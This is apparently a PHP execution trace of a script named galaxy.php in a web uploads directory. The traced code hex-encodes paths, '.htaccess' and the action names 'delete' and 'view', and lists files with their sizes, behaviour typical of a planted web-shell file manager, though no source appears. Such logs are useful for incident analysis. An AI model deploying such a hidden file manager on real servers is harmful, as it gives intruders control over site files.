3	1084	0	0.038096	485192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1084	1	0.038108	485232
3	1084	R			97
3	1085	0	0.038120	485192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1085	1	0.038131	485264
3	1085	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1086	0	0.038160	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	1086	1	0.038172	485240
3	1086	R			99
3	1087	0	0.038184	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	1087	1	0.038195	485272
3	1087	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1088	0	0.038224	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	1088	1	0.038235	485240
3	1088	R			99
3	1089	0	0.038247	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	1089	1	0.038258	485272
3	1089	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1090	0	0.038287	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1090	1	0.038298	485240
3	1090	R			101
3	1091	0	0.038310	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1091	1	0.038322	485272
3	1091	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1092	0	0.038350	485200	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1092	1	0.038362	485240
3	1092	R			115
3	1093	0	0.038374	485200	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1093	1	0.038385	485272
3	1093	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1094	0	0.038413	485208	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1094	1	0.038425	485248
3	1094	R			115
3	1095	0	0.038436	485208	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1095	1	0.038447	485280
3	1095	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1077	1	0.038475	485208
2	1077	R			'2e6874616363657373'
2	1096	0	0.038490	485288	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1097	0	0.038520	485288	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1097	1	0.038531	485328
3	1097	R			47
3	1098	0	0.038543	485288	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1098	1	0.038554	485360
3	1098	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1099	0	0.038584	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1099	1	0.038596	485360
3	1099	R			118
3	1100	0	0.038607	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1100	1	0.038619	485392
3	1100	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1101	0	0.038648	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1101	1	0.038659	485360
3	1101	R			97
3	1102	0	0.038671	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1102	1	0.038686	485392
3	1102	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1103	0	0.038716	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1103	1	0.038727	485360
3	1103	R			114
3	1104	0	0.038739	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1104	1	0.038750	485392
3	1104	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1105	0	0.038779	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1105	1	0.038791	485368
3	1105	R			47
3	1106	0	0.038808	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1106	1	0.038819	485400
3	1106	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1107	0	0.038848	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1107	1	0.038859	485368
3	1107	R			119
3	1108	0	0.038871	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1108	1	0.038883	485400
3	1108	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1109	0	0.038912	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1109	1	0.038923	485368
3	1109	R			119
3	1110	0	0.038935	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1110	1	0.038946	485400
3	1110	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1111	0	0.038975	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1111	1	0.038986	485368
3	1111	R			119
3	1112	0	0.038999	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1112	1	0.039010	485400
3	1112	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1113	0	0.039038	485336	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1113	1	0.039050	485376
3	1113	R			47
3	1114	0	0.039062	485336	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1114	1	0.039073	485408
3	1114	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1115	0	0.039102	485336	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1115	1	0.039113	485376
3	1115	R			104
3	1116	0	0.039125	485336	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1116	1	0.039137	485408
3	1116	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1117	0	0.039165	485336	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1117	1	0.039177	485376
3	1117	R			116
3	1118	0	0.039189	485336	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1118	1	0.039201	485408
3	1118	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1119	0	0.039229	485336	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1119	1	0.039241	485376
3	1119	R			109
3	1120	0	0.039253	485336	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1120	1	0.039264	485408
3	1120	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1121	0	0.039293	485344	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1121	1	0.039305	485384
3	1121	R			108
3	1122	0	0.039317	485344	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1122	1	0.039328	485416
3	1122	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1123	0	0.039357	485344	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1123	1	0.039368	485384
3	1123	R			47
3	1124	0	0.039380	485344	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1124	1	0.039395	485416
3	1124	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1125	0	0.039424	485344	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1125	1	0.039435	485384
3	1125	R			117
3	1126	0	0.039448	485344	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1126	1	0.039459	485416
3	1126	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1127	0	0.039489	485344	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1127	1	0.039500	485384
3	1127	R			112
3	1128	0	0.039512	485344	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1128	1	0.039523	485416
3	1128	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1129	0	0.039553	485352	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1129	1	0.039564	485392
3	1129	R			108
3	1130	0	0.039576	485352	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1130	1	0.039587	485424
3	1130	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1131	0	0.039617	485352	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1131	1	0.039628	485392
3	1131	R			111
3	1132	0	0.039640	485352	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1132	1	0.039651	485424
3	1132	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1133	0	0.039680	485352	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1133	1	0.039691	485392
3	1133	R			97
3	1134	0	0.039704	485352	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1134	1	0.039715	485424
3	1134	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1135	0	0.039744	485352	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1135	1	0.039755	485392
3	1135	R			100
3	1136	0	0.039766	485352	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1136	1	0.039778	485424
3	1136	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1137	0	0.039807	485368	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1137	1	0.039818	485408
3	1137	R			115
3	1138	0	0.039830	485368	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1138	1	0.039841	485440
3	1138	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1096	1	0.039870	485368
2	1096	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1139	0	0.039886	485288	hex	1		/var/www/html/uploads/galaxy.php	117	1	'delete'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1140	0	0.039917	485288	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1140	1	0.039928	485328
3	1140	R			100
3	1141	0	0.039940	485288	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1141	1	0.039951	485360
3	1141	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1142	0	0.039981	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1142	1	0.039992	485360
3	1142	R			101
3	1143	0	0.040004	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1143	1	0.040015	485392
3	1143	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1144	0	0.040044	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1144	1	0.040056	485360
3	1144	R			108
3	1145	0	0.040068	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1145	1	0.040079	485392
3	1145	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1146	0	0.040113	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1146	1	0.040125	485360
3	1146	R			101
3	1147	0	0.040136	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1147	1	0.040148	485392
3	1147	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1148	0	0.040177	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1148	1	0.040188	485368
3	1148	R			116
3	1149	0	0.040200	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1149	1	0.040212	485400
3	1149	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1150	0	0.040241	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1150	1	0.040252	485368
3	1150	R			101
3	1151	0	0.040264	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1151	1	0.040275	485400
3	1151	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1139	1	0.040304	485328
2	1139	R			'64656c657465'
2	1152	0	0.040318	485288	hex	1		/var/www/html/uploads/galaxy.php	117	1	'.htaccess'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1153	0	0.040349	485288	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1153	1	0.040360	485328
3	1153	R			46
3	1154	0	0.040372	485288	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1154	1	0.040384	485360
3	1154	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1155	0	0.040413	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1155	1	0.040424	485360
3	1155	R			104
3	1156	0	0.040436	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1156	1	0.040466	485392
3	1156	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1157	0	0.040497	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1157	1	0.040509	485360
3	1157	R			116
3	1158	0	0.040522	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1158	1	0.040533	485392
3	1158	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1159	0	0.040574	485320	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1159	1	0.040587	485360
3	1159	R			97
3	1160	0	0.040599	485320	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1160	1	0.040611	485392
3	1160	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1161	0	0.040640	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	1161	1	0.040651	485368
3	1161	R			99
3	1162	0	0.040663	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	1162	1	0.040675	485400
3	1162	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1163	0	0.040704	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'c'
3	1163	1	0.040715	485368
3	1163	R			99
3	1164	0	0.040727	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	99
3	1164	1	0.040738	485400
3	1164	R			'63'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '63'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1165	0	0.040767	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1165	1	0.040779	485368
3	1165	R			101
3	1166	0	0.040791	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1166	1	0.040802	485400
3	1166	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1167	0	0.040833	485328	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1167	1	0.040884	485368
3	1167	R			115
3	1168	0	0.040900	485328	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1168	1	0.040912	485400
3	1168	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1169	0	0.040943	485336	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1169	1	0.040954	485376
3	1169	R			115
3	1170	0	0.040967	485336	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1170	1	0.040979	485408
3	1170	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1152	1	0.041008	485336
2	1152	R			'2e6874616363657373'
2	1171	0	0.041035	484432	is_file	0		/var/www/html/uploads/galaxy.php	113	1	'/var/www/html/uploads/data'
2	1171	1	0.041058	484472
2	1171	R			FALSE
2	1172	0	0.041072	484440	is_file	0		/var/www/html/uploads/galaxy.php	113	1	'/var/www/html/uploads/galaxy.php'
2	1172	1	0.041088	484488
2	1172	R			TRUE
2	1173	0	0.041101	484448	filesize	0		/var/www/html/uploads/galaxy.php	114	1	'/var/www/html/uploads/galaxy.php'
2	1173	1	0.041114	484488
2	1173	R			12323
1		A						/var/www/html/uploads/galaxy.php	114	$sz = 12.0341796875
2	1174	0	0.041139	484352	round	0		/var/www/html/uploads/galaxy.php	115	2	12.0341796875	3
2	1174	1	0.041152	484424
2	1174	R			12.034
1		A						/var/www/html/uploads/galaxy.php	115	$sz = 12.034
1		A						/var/www/html/uploads/galaxy.php	116	$sz = '12.034KB'
2	1175	0	0.041189	484392	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1176	0	0.041221	484392	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1176	1	0.041233	484432
3	1176	R			47
3	1177	0	0.041245	484392	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1177	1	0.041257	484464
3	1177	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1178	0	0.041287	484424	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1178	1	0.041299	484464
3	1178	R			118
3	1179	0	0.041312	484424	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1179	1	0.041323	484496
3	1179	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1180	0	0.041353	484424	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1180	1	0.041365	484464
3	1180	R			97
3	1181	0	0.041377	484424	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1181	1	0.041388	484496
3	1181	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1182	0	0.041418	484424	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1182	1	0.041429	484464
3	1182	R			114
3	1183	0	0.041441	484424	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1183	1	0.041453	484496
3	1183	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1184	0	0.041482	484432	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1184	1	0.041493	484472
3	1184	R			47
3	1185	0	0.041505	484432	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1185	1	0.041517	484504
3	1185	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1186	0	0.041546	484432	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1186	1	0.041557	484472
3	1186	R			119
3	1187	0	0.041569	484432	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1187	1	0.041581	484504
3	1187	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1188	0	0.041610	484432	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1188	1	0.041621	484472
3	1188	R			119
3	1189	0	0.041639	484432	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1189	1	0.041650	484504
3	1189	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1190	0	0.041679	484432	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1190	1	0.041690	484472
3	1190	R			119
3	1191	0	0.041703	484432	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1191	1	0.041714	484504
3	1191	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1192	0	0.041743	484440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1192	1	0.041754	484480
3	1192	R			47
3	1193	0	0.041766	484440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1193	1	0.041778	484512
3	1193	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1194	0	0.041807	484440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1194	1	0.041819	484480
3	1194	R			104
3	1195	0	0.041830	484440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1195	1	0.041842	484512
3	1195	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1196	0	0.041871	484440	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1196	1	0.041883	484480
3	1196	R			116
3	1197	0	0.041895	484440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1197	1	0.041906	484512
3	1197	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1198	0	0.041936	484440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1198	1	0.041947	484480
3	1198	R			109
3	1199	0	0.041959	484440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1199	1	0.041970	484512
3	1199	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1200	0	0.042000	484448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1200	1	0.042011	484488
3	1200	R			108
3	1201	0	0.042022	484448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1201	1	0.042034	484520
3	1201	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1202	0	0.042063	484448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1202	1	0.042074	484488
3	1202	R			47
3	1203	0	0.042086	484448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1203	1	0.042097	484520
3	1203	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1204	0	0.042127	484448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1204	1	0.042138	484488
3	1204	R			117
3	1205	0	0.042150	484448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1205	1	0.042161	484520
3	1205	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1206	0	0.042191	484448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1206	1	0.042203	484488
3	1206	R			112
3	1207	0	0.042215	484448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1207	1	0.042226	484520
3	1207	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1208	0	0.042254	484456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1208	1	0.042266	484496
3	1208	R			108
3	1209	0	0.042278	484456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1209	1	0.042289	484528
3	1209	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1210	0	0.042318	484456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1210	1	0.042330	484496
3	1210	R			111
3	1211	0	0.042344	484456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1211	1	0.042356	484528
3	1211	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1212	0	0.042385	484456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1212	1	0.042396	484496
3	1212	R			97
3	1213	0	0.042408	484456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1213	1	0.042420	484528
3	1213	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1214	0	0.042448	484456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1214	1	0.042459	484496
3	1214	R			100
3	1215	0	0.042472	484456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1215	1	0.042483	484528
3	1215	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1216	0	0.042512	484472	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1216	1	0.042524	484512
3	1216	R			115
3	1217	0	0.042536	484472	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1217	1	0.042547	484544
3	1217	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1175	1	0.042577	484472
2	1175	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1218	0	0.042592	484488	hex	1		/var/www/html/uploads/galaxy.php	117	1	'view'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1219	0	0.042623	484488	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1219	1	0.042634	484528
3	1219	R			118
3	1220	0	0.042646	484488	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1220	1	0.042658	484560
3	1220	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1221	0	0.042687	484520	ord	0		/var/www/html/uploads/galaxy.php	18	1	'i'
3	1221	1	0.042699	484560
3	1221	R			105
3	1222	0	0.042711	484520	dechex	0		/var/www/html/uploads/galaxy.php	18	1	105
3	1222	1	0.042723	484592
3	1222	R			'69'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '69'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1223	0	0.042752	484520	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1223	1	0.042764	484560
3	1223	R			101
3	1224	0	0.042777	484520	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1224	1	0.042789	484592
3	1224	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1225	0	0.042827	484520	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1225	1	0.042839	484560
3	1225	R			119
3	1226	0	0.042852	484520	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1226	1	0.042863	484592
3	1226	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1218	1	0.042894	484528
2	1218	R			'76696577'
2	1227	0	0.042908	484504	hex	1		/var/www/html/uploads/galaxy.php	117	1	'galaxy.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1228	0	0.042939	484504	ord	0		/var/www/html/uploads/galaxy.php	18	1	'g'
3	1228	1	0.042951	484544
3	1228	R			103
3	1229	0	0.042963	484504	dechex	0		/var/www/html/uploads/galaxy.php	18	1	103
3	1229	1	0.042975	484576
3	1229	R			'67'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '67'
